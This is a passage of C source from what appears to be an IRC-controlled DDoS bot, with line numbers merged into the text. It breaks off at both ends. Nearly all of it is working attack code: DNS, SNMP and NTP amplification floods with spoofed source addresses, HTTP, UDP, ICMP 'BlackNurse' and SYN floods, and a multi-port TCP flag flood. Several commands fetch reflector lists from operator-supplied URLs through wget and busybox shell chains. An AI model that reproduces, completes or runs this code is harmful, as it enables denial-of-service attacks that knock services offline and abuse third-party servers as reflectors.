sender);1011Send(sock, "NOTICE %s :Current status is: %s\n", sender,disabled?"Disabled":"Enabled and awaiting orders");1012return;1013}1014if(disabled) {1015Send(sock, "NOTICE %s :Already disabled.\n", sender);1016return;1017}1018if(strlen(argv[1]) > 254) {1019Send(sock, "NOTICE %s :Password too long! > 254\n", sender);1020return;1021}1022disabled=1;1023memset(dispass,0,256);1024strcpy(dispass,argv[1]);1025Send(sock, "NOTICE %s :Disable sucessful.\n");1026}10271028void enable(int sock, char *sender, int argc, char **argv) {1029if(argc != 1) {1030Send(sock, "NOTICE %s :ENABLE <pass>\n", sender);1031Send(sock, "NOTICE %s :Current status is: %s\n", sender,disabled?"Disabled":"Enabled and awaiting orders");1032return;1033}1034if(!disabled) {1035Send(sock, "NOTICE %s :Already enabled.\n", sender);1036return;1037}1038if(strcasecmp(dispass,argv[1])) {1039Send(sock, "NOTICE %s :Wrong password\n", sender);1040return;1041}1042disabled=0;1043Send(sock, "NOTICE %s :Password correct.\n", sender);1044}10451046void spoof(int sock, char *sender, int argc, char **argv) {1047char ip[256];1048int i, num;1049unsigned long uip;1050struct sockaddr_in addr;1051if(argc != 1) {1052Send(sock, "NOTICE %s :Removed all spoofs\n", sender);1053spoofs=0;1054spoofsm=0;1055return;1056}1057if(strlen(argv[1]) > 16) {1058Send(sock, "NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n", sender);1059return;1060}1061strcpy(ip,argv[1]);1062if(ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;1063for (i=0, num=1;i<strlen(ip);i++) if(ip[i] == '.') num++;1064num=-(num-4);1065for (i=0;i<num;i++) strcat(ip,".0");1066inet_aton(ip, &(addr.sin_addr));1067uip = addr.sin_addr.s_addr;1068if(num == 0) spoofsm=1;1069else spoofsm=poww(256,num);1070spoofs=uip;1071}1072struct send_tcp {1073struct iphdr ip;1074struct tcphdr tcp;1075char buf[20];1076};1077struct pseudo_header {1078unsigned int source_address;1079unsigned int dest_address;1080unsigned char placeholder;1081unsigned char protocol;1082unsigned short tcp_length;1083struct tcphdr tcp;1084char buf[20];1085};1086unsigned int host2ip(char *sender,char *hostname) {1087static struct in_addr i;1088struct hostent *h;1089if((i.s_addr = inet_addr(hostname)) == -1) {1090if((h = gethostbyname(hostname)) == NULL) {1091Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);1092exit(0);1093}1094bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);1095}1096return i.s_addr;1097}10981099static uint32_t Q[4096], c = 362436;11001101struct list1102{1103struct sockaddr_in data;1104char domain[512];1105int line;1106struct list *next;1107struct list *prev;1108};1109struct list *head;11101111struct thread_data{1112int thread_id;1113struct list *list_node;1114struct sockaddr_in sin;1115int port;1116};11171118struct DNS_HEADER1119{1120unsigned short id; // identification number11211122unsigned char rd :1; // recursion desired1123unsigned char tc :1; // truncated message1124unsigned char aa :1; // authoritive answer1125unsigned char opcode :4; // purpose of message1126unsigned char qr :1; // query/response flag11271128unsigned char rcode :4; // response code1129unsigned char cd :1; // checking disabled1130unsigned char ad :1; // authenticated data1131unsigned char z :1; // its z! reserved1132unsigned char ra :1; // recursion available11331134unsigned short q_count; // number of question entries1135unsigned short ans_count; // number of answer entries1136unsigned short auth_count; // number of authority entries1137unsigned short add_count; // number of resource entries1138};11391140//Constant sized fields of query structure1141struct QUESTION1142{1143unsigned short qtype;1144unsigned short qclass;1145};11461147//Constant sized fields of the resource record structure1148struct QUERY1149{1150unsigned char *name;1151struct QUESTION *ques;1152};11531154void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)1155{1156int lock = 0 , i;1157strcat((char*)host,".");11581159for(i = 0 ; i < strlen((char*)host) ; i++)1160{1161if(host[i]=='.')1162{1163*dns++ = i-lock;1164for(;lock<i;lock++)1165{1166*dns++=host[lock];1167}1168lock++; //or lock=i+1;1169}1170}1171*dns++='\0';1172}1173void init_rand(uint32_t x)1174{1175int i;11761177Q[0] = x;1178Q[1] = x + PHI;1179Q[2] = x + PHI + PHI;11801181for (i = 3; i < 4096; i++)1182Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;1183}11841185uint32_t rand_cmwc(void)1186{1187uint64_t t, a = 18782LL;1188static uint32_t i = 4095;1189uint32_t x, r = 0xfffffffe;1190i = (i + 1) & 4095;1191t = a * Q[i] + c;1192c = (t >> 32);1193x = t + c;1194if(x < c) {1195x++;1196c++;1197}1198return (Q[i] = r - x);1199}12001201void setup_udp_header(struct udphdr *udph)1202{12031204}12051206void *dnsflood(void *par1)1207{1208if(listFork()) return;1209struct thread_data *td = (struct thread_data *)par1;12101211char strPacket[MAX_PACKET_SIZE];1212int iPayloadSize = 0;12131214struct sockaddr_in sin = td->sin;1215struct list *list_node = td->list_node;1216int iPort = td->port;12171218int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);1219if(s < 0) {1220exit(-1);1221}12221223//init random1224init_rand(time(NULL));12251226// Clear the data1227memset(strPacket, 0, MAX_PACKET_SIZE);12281229// Make the packet1230struct iphdr *iph = (struct iphdr *) &strPacket;1231iph->ihl = 5;1232iph->version = 4;1233iph->tos = 0;1234iph->tot_len = sizeof(struct iphdr) + 38;1235iph->id = htonl(54321);1236iph->frag_off = 0;1237iph->ttl = MAXTTL;1238iph->protocol = IPPROTO_UDP;1239iph->check = 0;1240iph->saddr = inet_addr("192.168.3.100");12411242iPayloadSize += sizeof(struct iphdr);124312441245struct udphdr *udph = (struct udphdr *) &strPacket[iPayloadSize];1246udph->source = htons(iPort);1247udph->dest = htons(53);1248udph->check = 0;12491250iPayloadSize += sizeof(struct udphdr);12511252struct DNS_HEADER *dns = (struct DNS_HEADER *) &strPacket[iPayloadSize];1253dns->id = (unsigned short) htons(rand_cmwc());1254dns->qr = 0; //This is a query1255dns->opcode = 0; //This is a standard query1256dns->aa = 0; //Not Authoritative1257dns->tc = 0; //This message is not truncated1258dns->rd = 1; //Recursion Desired1259dns->ra = 0; //Recursion not available! hey we dont have it1260dns->z = 0;1261dns->ad = 0;1262dns->cd = 0;1263dns->rcode = 0;1264dns->q_count = htons(1); //we have only 1 question1265dns->ans_count = 0;1266dns->auth_count = 0;1267dns->add_count = htons(1);12681269iPayloadSize += sizeof(struct DNS_HEADER);12701271sin.sin_port = udph->source;1272iph->saddr = sin.sin_addr.s_addr;1273iph->daddr = list_node->data.sin_addr.s_addr;1274iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);127512761277char strDomain[512];1278int i;1279int j = 0;1280int iAdditionalSize = 0;1281while(1)1282{1283if(j==2){1284usleep(100);1285j=0;1286}1287128812891290//set the next node1291list_node = list_node->next;12921293//Clear the old domain and question1294memset(&strPacket[iPayloadSize + iAdditionalSize], 0, iAdditionalSize+256);12951296//add the chosen domain and question1297iAdditionalSize = 0;12981299unsigned char *qname = (unsigned char*) &strPacket[iPayloadSize + iAdditionalSize];13001301strcpy(strDomain, list_node->domain);1302ChangetoDnsNameFormat(qname, strDomain);1303//printf("!!%s %d\n", list_node->domain, list_node->line);13041305iAdditionalSize += strlen(qname) + 1;13061307struct QUESTION *qinfo = (struct QUESTION *) &strPacket[iPayloadSize + iAdditionalSize];1308qinfo->qtype = htons(255); //type of the query , A , MX , CNAME , NS etc1309qinfo->qclass = htons(1);13101311iAdditionalSize += sizeof(struct QUESTION);13121313strPacket[iPayloadSize + iAdditionalSize] = 0x00;1314strPacket[iPayloadSize + iAdditionalSize + 1] = 0x00;1315strPacket[iPayloadSize + iAdditionalSize + 2] = 0x29;1316strPacket[iPayloadSize + iAdditionalSize + 3] = 0x23;1317strPacket[iPayloadSize + iAdditionalSize + 4] = 0x28;1318strPacket[iPayloadSize + iAdditionalSize + 5] = 0x00;1319strPacket[iPayloadSize + iAdditionalSize + 6] = 0x00;1320strPacket[iPayloadSize + iAdditionalSize + 7] = 0x00;1321strPacket[iPayloadSize + iAdditionalSize + 8] = 0x00;1322strPacket[iPayloadSize + iAdditionalSize + 9] = 0x00;1323strPacket[iPayloadSize + iAdditionalSize + 10] = 0x00;1324strPacket[iPayloadSize + iAdditionalSize + 11] = 0x00;13251326iAdditionalSize += 11;132713281329//set new node data1330iph->daddr = list_node->data.sin_addr.s_addr;13311332udph->len= htons((iPayloadSize + iAdditionalSize) - sizeof(struct iphdr));1333iph->tot_len = iPayloadSize + iAdditionalSize;13341335udph->source = htons(rand_cmwc() & 0xFFFF);1336iph->check = csum ((unsigned short *) strPacket, iph->tot_len >> 1);13371338//send1339for(i = 0; i < PACKETS_PER_RESOLVER; i++)1340{1341sendto(s, strPacket, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));1342}13431344j++;1345}1346}13471348void ParseResolverLine(char *strLine, int iLine)1349{1350char caIP[32] = "";1351char caDNS[512] = "";13521353int i;1354char buffer[512] = "";13551356int moved = 0;13571358for(i = 0; i < strlen(strLine); i++)1359{1360if(strLine[i] == ' ' || strLine[i] == '\n' || strLine[i] == '\t')1361{1362moved++;1363continue;1364}13651366if(moved == 0)1367{1368caIP[strlen(caIP)] = (char) strLine[i];1369}1370else if(moved == 1)1371{1372caDNS[strlen(caDNS)] = (char) strLine[i];1373}1374}13751376//printf("Found resolver %s, domain %s!\n", caIP, caDNS);13771378if(head == NULL)1379{1380head = (struct list *)malloc(sizeof(struct list));13811382bzero(&head->data, sizeof(head->data));13831384head->data.sin_addr.s_addr=inet_addr(caIP);1385head->data.sin_port=htons(53);1386strcpy(head->domain, caDNS);1387head->line = iLine;1388head->next = head;1389head->prev = head;1390}1391else1392{1393struct list *new_node = (struct list *)malloc(sizeof(struct list));13941395memset(new_node, 0x00, sizeof(struct list));13961397new_node->data.sin_addr.s_addr=inet_addr(caIP);1398new_node->data.sin_port=htons(53);1399strcpy(new_node->domain, caDNS);1400new_node->prev = head;1401head->line = iLine;1402new_node->next = head->next;1403head->next = new_node;1404}1405}14061407void dns(int sockfd, char *sender, int argc, char **argv)1408{1409if(mfork(sender) != 0) return;1410int get;1411if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);1412if(argc < 5) {1413Send(sock, "NOTICE %s :DNS <IP> <port> <reflection file url> <threads> <time>\n", sender);1414exit(-1);1415}1416char command[1024];1417int myLen = 160 + (strlen(argv[3]) * 5);1418if(myLen >= 1024) {1419return;1420}1421snprintf(command, myLen, "wget \"%s\" -q -O DNS.txt || busybox wget \"%s\" -O DNS.txt || /bin/busybox wget \"%s\" -O DNS.txt || /usr/busybox wget \"%s\" -O DNS.txt || /var/run/busybox wget \"%s\" -O DNS.txt", argv[3], argv[3], argv[3], argv[3], argv[3]);1422system(command);1423head = NULL;1424char *strLine = (char *) malloc(256);1425strLine = memset(strLine, 0x00, 256);1426char strIP[32] = "";1427char strDomain[256] = "";1428int iLine = 0; // 0 = ip, 1 = domain.1429FILE *list_fd = fopen("DNS.txt", "r");1430while(fgets(strLine, 256, list_fd) != NULL) {1431ParseResolverLine(strLine, iLine);1432iLine++;1433}143414351436int i = 0;1437int num_threads = atoi(argv[4]);14381439struct list *current = head->next;1440struct sockaddr_in sin;1441sin.sin_family = AF_INET;1442sin.sin_port = htons(0);1443sin.sin_addr.s_addr = inet_addr(argv[1]);1444struct thread_data td[num_threads];14451446int iPort = atoi(argv[2]);14471448for(i = 0; i < num_threads; i++)1449{1450td[i].thread_id = i;1451td[i].sin= sin;1452td[i].list_node = current;1453td[i].port = iPort;1454dnsflood((void *) &td[i]);1455}14561457Send(sock, "NOTICE %s :DNS amp attacking %s:%s\n", sender,argv[1],argv[2]);1458if(argc > 4)1459{1460sleep(atoi(argv[5]));1461}14621463exit(1);1464}14651466/* NEW AND IMPROVED SNMPv2 AMPLIFICATION DDOS SKRIPT. */14671468struct list *head;1469volatile int tehport;1470volatile int limiter;1471volatile unsigned int pps;1472volatile unsigned int sleeptime = 83;14731474void setup_snmp_header(struct udphdr *udph)1475{1476udph->source = htons(4500);1477udph->dest = htons(161);1478udph->check = 0;1479memcpy((void *)udph + sizeof(struct udphdr), "\x45\x00\x00\x43\x00\x00\x40\x00\x40\x11\xe0\xce\xa8\xeb\x46\x40\x29\xb5\x40\xfb\xce\x19\x00\xa1\x00\x2f\x0a\x13\x30\x25\x02\x01\x01\x04\x06\x70\x75\x62\x6c\x69\x63\xa5\x18\x02\x04\x30\x54\xbc\x3f\x02\x01\x00\x02\x02\x08\xca\x30\x09\x30\x07\x06\x03\x2b\x06\x01\x05\x00", 67);1480udph->len=htons(sizeof(struct udphdr) + 67);1481}14821483void setup_ip_header(struct iphdr *iph)1484{1485iph->ihl = 5;1486iph->version = 4;1487iph->tos = 0;1488iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;1489iph->id = htonl(64074);1490iph->frag_off = 0;1491iph->ttl = MAXTTL;1492iph->protocol = IPPROTO_UDP;1493iph->check = 0;1494iph->saddr = inet_addr("192.168.1.83");1495}14961497void *snmpflood(void *par1)1498{1499struct thread_data *td = (struct thread_data *)par1;1500char datagram[MAX_PACKET_SIZE];1501struct iphdr *iph = (struct iphdr *)datagram;1502struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);1503struct sockaddr_in sin = td->sin;1504struct list *list_node = td->list_node;1505int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);1506if(s < 0){1507exit(-1);1508}1509init_rand(time(NULL));1510memset(datagram, 0, MAX_PACKET_SIZE);1511setup_ip_header(iph);1512setup_snmp_header(udph);1513udph->source = htons(rand() % 65535 - 1026);1514iph->saddr = sin.sin_addr.s_addr;1515iph->daddr = list_node->data.sin_addr.s_addr;1516iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);1517int tmp = 1;1518const int *val = &tmp;1519if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){1520exit(-1);1521}1522init_rand(time(NULL));1523register unsigned int i;1524i = 0;1525while(1){1526sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));1527list_node = list_node->next;1528iph->daddr = list_node->data.sin_addr.s_addr;1529iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);1530iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);15311532pps++;1533if(i >= limiter)1534{1535i = 0;1536usleep(sleeptime);1537}1538i++;1539}1540}15411542void snmp(int sock, char *sender, int argc, char**argv) {1543if(mfork(sender) != 0) return;1544int get;1545if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);1546if(argc < 6){1547Send(sock, "NOTICE %s :SNMP <IP> <port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);1548exit(-1);1549}15501551char command[1024];1552int myLen = 165 + (strlen(argv[3]) * 5);1553if(myLen >= 1024) {1554return;1555}1556snprintf(command, myLen, "wget \"%s\" -q -O SNMP.txt || busybox wget \"%s\" -O SNMP.txt || /bin/busybox wget \"%s\" -O SNMP.txt || /usr/busybox wget \"%s\" -O SNMP.txt || /var/run/busybox wget \"%s\" -O SNMP.txt", argv[3], argv[3], argv[3], argv[3], argv[3]);1557system(command);1558srand(time(NULL));1559int i = 0;1560head = NULL;1561int max_len = 128;1562char *buffer = (char *) malloc(max_len);1563buffer = memset(buffer, 0x00, max_len);1564int num_threads = atoi(argv[4]);1565int maxpps = atoi(argv[5]);1566limiter = 0;1567pps = 0;1568int multiplier = 20;1569FILE *list_fd = fopen("SNMP.txt", "r");1570while(fgets(buffer, max_len, list_fd) != NULL) {1571if((buffer[strlen(buffer) - 1] == '\n') ||1572(buffer[strlen(buffer) - 1] == '\r')) {1573buffer[strlen(buffer) - 1] = 0x00;1574if(head == NULL)1575{1576head = (struct list *)malloc(sizeof(struct list));1577bzero(&head->data, sizeof(head->data));1578head->data.sin_addr.s_addr=inet_addr(buffer);1579head->next = head;1580head->prev = head;1581} else {1582struct list *new_node = (struct list *)malloc(sizeof(struct list));1583memset(new_node, 0x00, sizeof(struct list));1584new_node->data.sin_addr.s_addr=inet_addr(buffer);1585new_node->prev = head;1586new_node->next = head->next;1587head->next = new_node;1588}1589i++;1590} else {1591continue;1592}1593}1594struct list *current = head->next;1595struct sockaddr_in sin;1596sin.sin_family = AF_INET;1597sin.sin_addr.s_addr = inet_addr(argv[1]);1598struct thread_data td[num_threads];1599for(i = 0;i<num_threads;i++){1600td[i].thread_id = i;1601td[i].sin= sin;1602td[i].list_node = current;1603snmpflood((void *) &td[i]);1604}16051606Send(sock, "NOTICE %s :SNMP amp attacking %s:%s\n", sender,argv[1],argv[2]);16071608for(i = 0;i<(atoi(argv[6])*multiplier);i++)1609{1610usleep((1000/multiplier)*1000);1611if((pps*multiplier) > maxpps)1612{1613if(1 > limiter)1614{1615sleeptime+=100;1616} else {1617limiter--;1618}1619} else {1620limiter++;1621if(sleeptime > 25)1622{1623sleeptime-=25;1624} else {1625sleeptime = 0;1626}1627}1628pps = 0;1629}1630return;1631}16321633void wgetHTTP(int sock, char *sender, int argc, char **argv) {1634unsigned char *url;1635int end_time;1636if(mfork(sender) != 0) return;1637if(argc < 2) {1638Send(sock, "NOTICE %s :WGETFLOOD <url> <secs>\n", sender);1639exit(1);1640}16411642url = argv[1];1643end_time = atoi(argv[2]);16441645int end = time(NULL) + end_time;1646char *UA = UserAgents[(rand() % 36)];1647char command[1024];16481649Send(sock, "NOTICE %s :HTTP Flooding %s\n", sender, url);165016511652while(end > time(NULL))1653{1654UA = UserAgents[(rand() % 36)];1655snprintf(command, 164 + (strlen(UA) * 4) + (strlen(url) * 4), "wget -U \"%s\" -q \"%s\" -O /dev/null || busybox wget -U \"%s\" -q \"%s\" -O /dev/null || /bin/busybox wget -U \"%s\" -q \"%s\" -O /dev/null || /usr/busybox wget -U \"%s\" -q \"%s\" -O /dev/null &", UA, url, UA, url, UA, url, UA, url);1656system(command);1657}1658exit(1);1659}16601661void *ntpflood(void *par1)1662{1663struct thread_data *td = (struct thread_data *)par1;1664char datagram[MAX_PACKET_SIZE];1665struct iphdr *iph = (struct iphdr *)datagram;1666struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);1667struct sockaddr_in sin = td->sin;1668struct list *list_node = td->list_node;1669int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);1670if(s < 0){1671exit(-1);1672}1673init_rand(time(NULL));1674memset(datagram, 0, MAX_PACKET_SIZE);1675setup_ip_header(iph);1676setup_udp_header(udph);1677udph->source = htons((rand() % (65535 - 1026)) + 1026);1678iph->saddr = sin.sin_addr.s_addr;1679iph->daddr = list_node->data.sin_addr.s_addr;1680iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);1681int tmp = 1;1682const int *val = &tmp;1683if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){1684exit(-1);1685}1686init_rand(time(NULL));1687register unsigned int i;1688i = 0;1689while(1){1690sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));1691list_node = list_node->next;1692iph->daddr = list_node->data.sin_addr.s_addr;1693iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);1694iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);16951696pps++;1697if(i >= limiter)1698{1699i = 0;1700usleep(sleeptime);1701}1702i++;1703}1704}17051706void ntp(int sock, char *sender, int argc, char **argv) {1707if(mfork(sender) != 0) return;1708int get;1709if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);1710if(argc < 6) {1711Send(sock, "NOTICE %s :NTP <target IP> <target port> <reflection file url> <threads> <pps limiter, -1 for no limit> <time>\n", sender);1712exit(1);1713}1714char command[1024];1715int myLen = 160 + (strlen(argv[3]) * 5);1716if(myLen >= 1024) {1717return;1718}1719snprintf(command, myLen, "wget \"%s\" -q -O NTP.txt || busybox wget \"%s\" -O NTP.txt || /bin/busybox wget \"%s\" -O NTP.txt || /usr/busybox wget \"%s\" -O NTP.txt || /var/run/busybox wget \"%s\" -O NTP.txt", argv[3], argv[3], argv[3], argv[3], argv[3]);1720system(command);1721srand(time(NULL));1722int i = 0;1723head = NULL;1724int max_len = 128;1725char *buffer = (char *) malloc(max_len);1726buffer = memset(buffer, 0x00, max_len);1727int num_threads = atoi(argv[4]);1728int maxpps = atoi(argv[5]);1729limiter = 0;1730pps = 0;1731int multiplier = 20;1732FILE *list_fd = fopen("NTP.txt", "r");1733while(fgets(buffer, max_len, list_fd) != NULL) {1734if((buffer[strlen(buffer) - 1] == '\n') ||1735(buffer[strlen(buffer) - 1] == '\r')) {1736buffer[strlen(buffer) - 1] = 0x00;1737if(head == NULL)1738{1739head = (struct list *)malloc(sizeof(struct list));1740bzero(&head->data, sizeof(head->data));1741head->data.sin_addr.s_addr=inet_addr(buffer);1742head->next = head;1743head->prev = head;1744} else {1745struct list *new_node = (struct list *)malloc(sizeof(struct list));1746memset(new_node, 0x00, sizeof(struct list));1747new_node->data.sin_addr.s_addr=inet_addr(buffer);1748new_node->prev = head;1749new_node->next = head->next;1750head->next = new_node;1751}1752i++;1753} else {1754continue;1755}1756}1757struct list *current = head->next;1758struct sockaddr_in sin;1759sin.sin_family = AF_INET;1760sin.sin_addr.s_addr = inet_addr(argv[1]);1761struct thread_data td[num_threads];1762for(i = 0;i<num_threads;i++){1763td[i].thread_id = i;1764td[i].sin= sin;1765td[i].list_node = current;1766ntpflood((void *) &td[i]);1767}17681769Send(sock, "NOTICE %s :NTP amp attacking %s:%s\n", sender,argv[1],argv[2]);17701771for(i = 0;i<(atoi(argv[6])*multiplier);i++)1772{1773usleep((1000/multiplier)*1000);1774if((pps*multiplier) > maxpps)1775{1776if(1 > limiter)1777{1778sleeptime+=100;1779} else {1780limiter--;1781}1782} else {1783limiter++;1784if(sleeptime > 25)1785{1786sleeptime-=25;1787} else {1788sleeptime = 0;1789}1790}1791pps = 0;1792}1793exit(0);1794}17951796void blacknurse(int sock, char *sender, int argc, char *argv[])1797{1798uint8_t pkt_template[] = {17990x03, 0x03, 0x0d, 0x33, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00, 0x1c, 0x4a, 0x04, 0x00, 0x00,18000x40, 0x06, 0x20, 0xc5, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x00, 0x00, 0x00, 0x00,18010x00, 0x08, 0xef, 0xc11802};1803uint8_t *pkt;1804struct addrinfo *ai, hints;1805const char *host;1806struct pollfd pfd;1807const size_t pkt_len = (sizeof pkt_template) / (sizeof pkt_template[0]);1808size_t i;1809int gai_err;1810int kindy;1811int x, secs,get;18121813time_t start=time(NULL);1814if(mfork(sender) != 0) return;1815if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);18161817if(argc < 2) {1818Send(sock, "NOTICE %s :BLACKNURSE <target ip> <secs>", sender);1819exit(1);1820}18211822host = argv[1];1823secs = atoi(argv[2]);18241825memset(&hints, 0, sizeof hints);1826hints.ai_family = AF_INET;1827if((gai_err = getaddrinfo(host, NULL, &hints, &ai)) != 0) {1828exit(1);1829}1830if((kindy = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {1831perror("socket");1832exit(1);1833}1834Send(sock, "NOTICE %s :Blacknursing %s\n", sender, host);1835pkt = pkt_template;1836pfd.fd = kindy;1837pfd.events = POLLOUT;1838for (;;) {1839for (i = 20; i < 20 + 8 + 4; i++) {1840pkt[i] = (uint8_t) rand();1841}1842if(sendto(kindy, pkt, pkt_len, 0,1843ai->ai_addr, ai->ai_addrlen) != (ssize_t) pkt_len) {1844if(errno == ENOBUFS) {1845poll(&pfd, 1, 1000);1846continue;1847}1848perror("sendto");1849break;1850}1851if(i >= 100) {1852if(time(NULL) >= start+secs) exit(0);1853x=0;1854}1855x++;1856}1857/* NOTREACHED */1858close(kindy);1859freeaddrinfo(ai);18601861return;1862}18631864void udp(int sock, char *sender, int argc, char **argv) {1865unsigned int port,i=0;1866unsigned long psize,target,secs;1867struct sockaddr_in s_in;1868struct iphdr *ip;1869struct udphdr *udp;1870char buf[1500],*str;1871int get;1872time_t start=time(NULL);1873if(mfork(sender) != 0) return;1874if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);1875if(argc < 3) {1876Send(sock, "NOTICE %s :UDP <target> <port> <secs>\n", sender);1877exit(1);1878}1879target = host2ip(sender,argv[1]);1880port = atoi(argv[2]);1881secs = atol(argv[3]);1882ip=(void*)buf;1883udp=(void*)(buf+sizeof(struct iphdr));1884str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));1885memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));1886Send(sock, "NOTICE %s :Packeting %s\n", sender,argv[1]);1887ip->ihl = 5;1888ip->version = 4;1889ip->tos = 0;1890ip->tot_len = 1500;1891ip->frag_off = 0;1892ip->protocol = 17;1893ip->ttl = 64;1894ip->daddr = target;1895udp->len = htons(psize);1896s_in.sin_family = AF_INET;1897s_in.sin_addr.s_addr = target;1898for (;;) {1899udp->source = rand();1900if(port) udp->dest = htons(port);1901else udp->dest = rand();1902udp->check = in_cksum((u_short *)buf,1500);1903ip->saddr = getspoof();1904ip->id = rand();1905ip->check = in_cksum((u_short *)buf,1500);1906s_in.sin_port = udp->dest;1907sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));1908if(i >= 100) {1909if(time(NULL) >= start+secs) exit(0);1910i=0;1911}1912i++;1913}1914}1915void pan(int sock, char *sender, int argc, char **argv) {1916struct send_tcp send_tcp;1917struct pseudo_header pseudo_header;1918struct sockaddr_in sin;1919unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;1920unsigned int psize=20, source, dest, check;1921unsigned long saddr, daddr,secs;1922time_t start=time(NULL);1923if(mfork(sender) != 0) return;1924int get;1925if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);1926if(argc < 3) {1927Send(sock, "NOTICE %s :PAN <target> <port> <secs>\n", sender);1928exit(1);1929}1930{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}1931daddr=host2ip(sender,argv[1]);1932secs=atol(argv[3]);1933Send(sock, "NOTICE %s :Panning %s\n", sender,argv[1]);1934send_tcp.ip.ihl = 5;1935send_tcp.ip.version = 4;1936send_tcp.ip.tos = 16;1937send_tcp.ip.frag_off = 64;1938send_tcp.ip.ttl = 64;1939send_tcp.ip.protocol = 6;1940send_tcp.tcp.ack_seq = 0;1941send_tcp.tcp.doff = 10;1942send_tcp.tcp.res1 = 0;1943send_tcp.tcp.urg = 0;1944send_tcp.tcp.ack = 0;1945send_tcp.tcp.psh = 0;1946send_tcp.tcp.rst = 0;1947send_tcp.tcp.fin = 0;1948send_tcp.tcp.syn = 1;1949send_tcp.tcp.window = 2048;1950send_tcp.tcp.urg_ptr = 0;1951dest=htons(atoi(argv[2]));1952srand(time(NULL) + getpid());1953while(1) {1954if(atoi(argv[2]) == 0) dest=rand();1955source=getspoof();1956send_tcp.ip.tot_len = htons(40+psize);1957send_tcp.ip.id = rand();1958send_tcp.ip.saddr = source;1959send_tcp.ip.daddr = daddr;1960send_tcp.tcp.source = source;1961send_tcp.tcp.dest = dest;1962send_tcp.tcp.seq = rand();1963sin.sin_port = dest;1964sin.sin_addr.s_addr = send_tcp.ip.daddr;1965send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);1966check = rand();1967send_tcp.buf[9]=((char*)&check)[0];1968send_tcp.buf[10]=((char*)&check)[1];1969send_tcp.buf[11]=((char*)&check)[2];1970send_tcp.buf[12]=((char*)&check)[3];1971pseudo_header.source_address = send_tcp.ip.saddr;1972pseudo_header.dest_address = send_tcp.ip.daddr;1973pseudo_header.placeholder = 0;1974pseudo_header.protocol = IPPROTO_TCP;1975pseudo_header.tcp_length = htons(20+psize);1976bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);1977bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);1978send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);1979sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));1980if(a >= 100) {1981if(time(NULL) >= start+secs) exit(0);1982a=0;1983}1984a++;1985}1986close(get);1987exit(0);1988}19891990void phatwonk(int sock, char *sender, int argc, char **argv) {1991// Phatwonk attack coded by Freak1992// Based off of PAN, modified to attack on 31 portz1993// You can set ANY TCP flag!1994// You can attack with xmas, all flags at once, usyn (urg syn), and any TCP flag combination you wish!1995// It's very hard to block and can down virtually every service at once1996struct send_tcp send_tcp;1997struct pseudo_header pseudo_header;1998struct sockaddr_in sin;1999unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;2000unsigned int psize=20, source, dest, check;2001unsigned long saddr, daddr,secs;2002unsigned int portz[] = { 21,22,23,25,53,80,81,88,110,113,119,135,137,139,143,443,445,1024,1025,1433,1500,1720,3128,3306,3389,5000,5900,6667,6697,8000,8080 };2003int howmanyportz = NUMITEMS(portz);2004time_t start=time(NULL);2005if(mfork(sender) != 0) return;2006int get;2007if((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);2008if(argc < 3) {2009Send(sock, "NOTICE %s :PHATWONK <target> <flags/method> <secs>\n", sender);2010exit(1);2011}2012{int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}2013daddr=host2ip(sender,argv[1]);2014secs=atol(argv[3]);2015Send(sock, "NOTICE %s :Phatwonking %s\n", sender,argv[1]);2016// Start preparing RAW TCP socket2017sin.sin_family = 